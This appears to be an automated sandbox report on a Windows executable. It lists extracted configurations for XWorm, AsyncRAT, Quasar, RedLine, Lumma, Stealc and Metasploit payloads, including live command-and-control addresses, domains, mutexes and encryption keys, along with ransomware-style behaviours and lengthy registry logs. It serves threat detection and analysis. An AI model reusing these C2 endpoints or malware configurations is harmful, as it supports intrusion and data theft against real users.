asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

14-11-2024 23:57

241114-3zzkpavhpf 10

14-11-2024 23:44

14-11-2024 23:36

14-11-2024 23:24

14-11-2024 23:10

Analysis

max time kernel
340s
max time network
367s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
14-11-2024 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

xworm

157.66.26.208:8848

45.66.231.231:7000

exonic-hacks.com:1920

Attributes

install_file
USB.exe

Extracted

Family

metasploit

Version

windows/reverse_tcp

89.197.154.116:7810

Extracted

Family

redline

Botnet

newbundle2

185.215.113.67:15206

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

7U2HW8ZYjc9H

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

metasploit

Version

windows/reverse_http

http://89.197.154.116:7810/VeM-buvtRWFTY1JiNZ2fGwUXc1CJXgbyOV5zM2vQ03kY7e4nGmyXkTKa8si-g-FfyAlpzs_FKQOSCtulsk34aryu-Ou9W2coAgl4jGnvIFVlgK-MlMyEitlm

Extracted

Family

lumma

https://absorptioniw.site

https://mysterisop.site

https://snarlypagowo.site

https://treatynreit.site

https://chorusarorp.site

https://abnomalrkmu.site

https://soldiefieop.site

https://questionsmw.store

https://wrappyskmwio.store

Extracted

Family

stealc

Botnet

default2

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

quasar

Version

1.4.1

Botnet

WenzCordRat

nickhill112-22345.portmap.host:22345

Mutex

7ee1db41-359a-46b2-bba3-791dc7cde5e1

Attributes

encryption_key
985DB7D034DB1B5D52F524873569DDDE4080F31C
install_name
WenzCord.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Update.exe
subdirectory
SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Aquarius

192.168.8.103:4782

192.168.8.105:4782

192.168.8.114:4782

Mutex

a198a147-9efc-419d-9539-bac2108dc109

Attributes

encryption_key
4CF458F992C472DE78F317085B34A8A1747FC32D
install_name
WindowsDataUpdater.exe
log_directory
Logs
reconnect_delay
3000
startup_key
WindowsDataUpdater
subdirectory
WinBioData

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Cobaltstrike family
cobaltstrike

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral1/files/0x000d000000015c18-165.dat	family_xworm
behavioral1/memory/2020-169-0x0000000000930000-0x0000000000988000-memory.dmp	family_xworm
behavioral1/memory/4484-12127-0x0000000000140000-0x0000000000158000-memory.dmp	family_xworm
behavioral1/files/0x000800000001211f-17328.dat	family_xworm
behavioral1/memory/6048-17372-0x00000000003D0000-0x00000000003EE000-memory.dmp	family_xworm
behavioral1/files/0x000700000000e60c-18838.dat	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Phorphiex family
phorphiex

Phorphiex payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001cb8f-1411.dat	family_phorphiex
behavioral1/files/0x0006000000012186-1423.dat	family_phorphiex
behavioral1/files/0x000900000001c846-1435.dat	family_phorphiex
behavioral1/files/0x000500000001cc46-6720.dat	family_phorphiex
behavioral1/files/0x0003000000020b72-17566.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/memory/7828-17604-0x00000000012E0000-0x000000000160A000-memory.dmp	family_quasar
behavioral1/files/0x0004000000020b64-17624.dat	family_quasar
behavioral1/memory/6628-17625-0x0000000000DC0000-0x00000000010E4000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0008000000003683-808.dat	family_redline
behavioral1/memory/2820-813-0x0000000000300000-0x0000000000352000-memory.dmp	family_redline
behavioral1/memory/6684-6717-0x0000000000A00000-0x0000000000A52000-memory.dmp	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000800000001a493-815.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
6344	bcdedit.exe
5872	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4568	powershell.exe
584	powershell.exe
3508	powershell.exe
1680	powershell.exe
2120	powershell.exe
7552	powershell.exe
2520	powershell.exe
10452	powershell.exe
1532	powershell.exe
6420	powershell.exe
4932	powershell.exe
9624	powershell.exe
6088	powershell.exe
5860	powershell.exe
7492	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
2020	XClient.exe
2152	svchost.exe
1536	svchost.exe

Loads dropped DLL 4 IoCs

pid	Process
3032	4363463463464363463463463.exe
3032	4363463463464363463463463.exe
2152	svchost.exe
1536	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
20	raw.githubusercontent.com
146	raw.githubusercontent.com
147	raw.githubusercontent.com
241	raw.githubusercontent.com
461	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
169	ip-api.com
410	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0003000000020b61-17504.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
2356	tasklist.exe
3028	tasklist.exe
5476	tasklist.exe
10812	tasklist.exe
9104	tasklist.exe
10788	tasklist.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000500000001eaeb-15171.dat	upx
behavioral1/files/0x0003000000020eb7-18565.dat	upx
behavioral1/files/0x0003000000020eb9-18567.dat	upx
behavioral1/files/0x0003000000020ec5-18574.dat	upx
behavioral1/files/0x0003000000020ec2-18572.dat	upx
behavioral1/files/0x0003000000020ec1-18571.dat	upx
behavioral1/files/0x0003000000020ebb-18568.dat	upx
behavioral1/files/0x0003000000020eb8-18566.dat	upx

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3200	sc.exe
3560	sc.exe
6476	sc.exe
6852	sc.exe
6168	sc.exe
1240	sc.exe
3104	sc.exe
3524	sc.exe
3628	sc.exe
8316	sc.exe
3380	sc.exe
6980	sc.exe
4360	sc.exe
3116	sc.exe
3136	sc.exe
3592	sc.exe
3616	sc.exe
4696	sc.exe
10260	sc.exe
8144	sc.exe
7308	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0005000000019e92-416.dat	pyinstaller
behavioral1/files/0x000600000001a4ab-889.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1528	5140	WerFault.exe	321
6828	8844	WerFault.exe	375

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

Delays execution with timeout.exe 27 IoCs

evasion

pid	Process
2376	timeout.exe
8776	timeout.exe
2276	timeout.exe
8048	timeout.exe
6164	timeout.exe
3692	timeout.exe
1736	timeout.exe
4408	timeout.exe
1788	timeout.exe
6656	timeout.exe
8120	timeout.exe
4980	timeout.exe
9716	timeout.exe
6780	timeout.exe
6260	timeout.exe
1532	timeout.exe
7848	timeout.exe
632	timeout.exe
8460	timeout.exe
10980	timeout.exe
1960	timeout.exe
4424	timeout.exe
868	timeout.exe
10048	timeout.exe
2576	timeout.exe
920	timeout.exe
9900	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1568	vssadmin.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
3236	taskkill.exe
5768	taskkill.exe
4960	taskkill.exe
5368	taskkill.exe
6528	taskkill.exe
9728	taskkill.exe
4892	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "3"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "4"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 74003100000000004a5925451100557365727300600008000400efbeee3a851a4a5925452a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2728	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3020	schtasks.exe
10596	schtasks.exe
3144	schtasks.exe
2064	schtasks.exe
5064	schtasks.exe
1388	schtasks.exe
6560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2832	chrome.exe
2832	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3032	4363463463464363463463463.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeDebugPrivilege	2020	XClient.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
Token: SeShutdownPrivilege	2832	chrome.exe
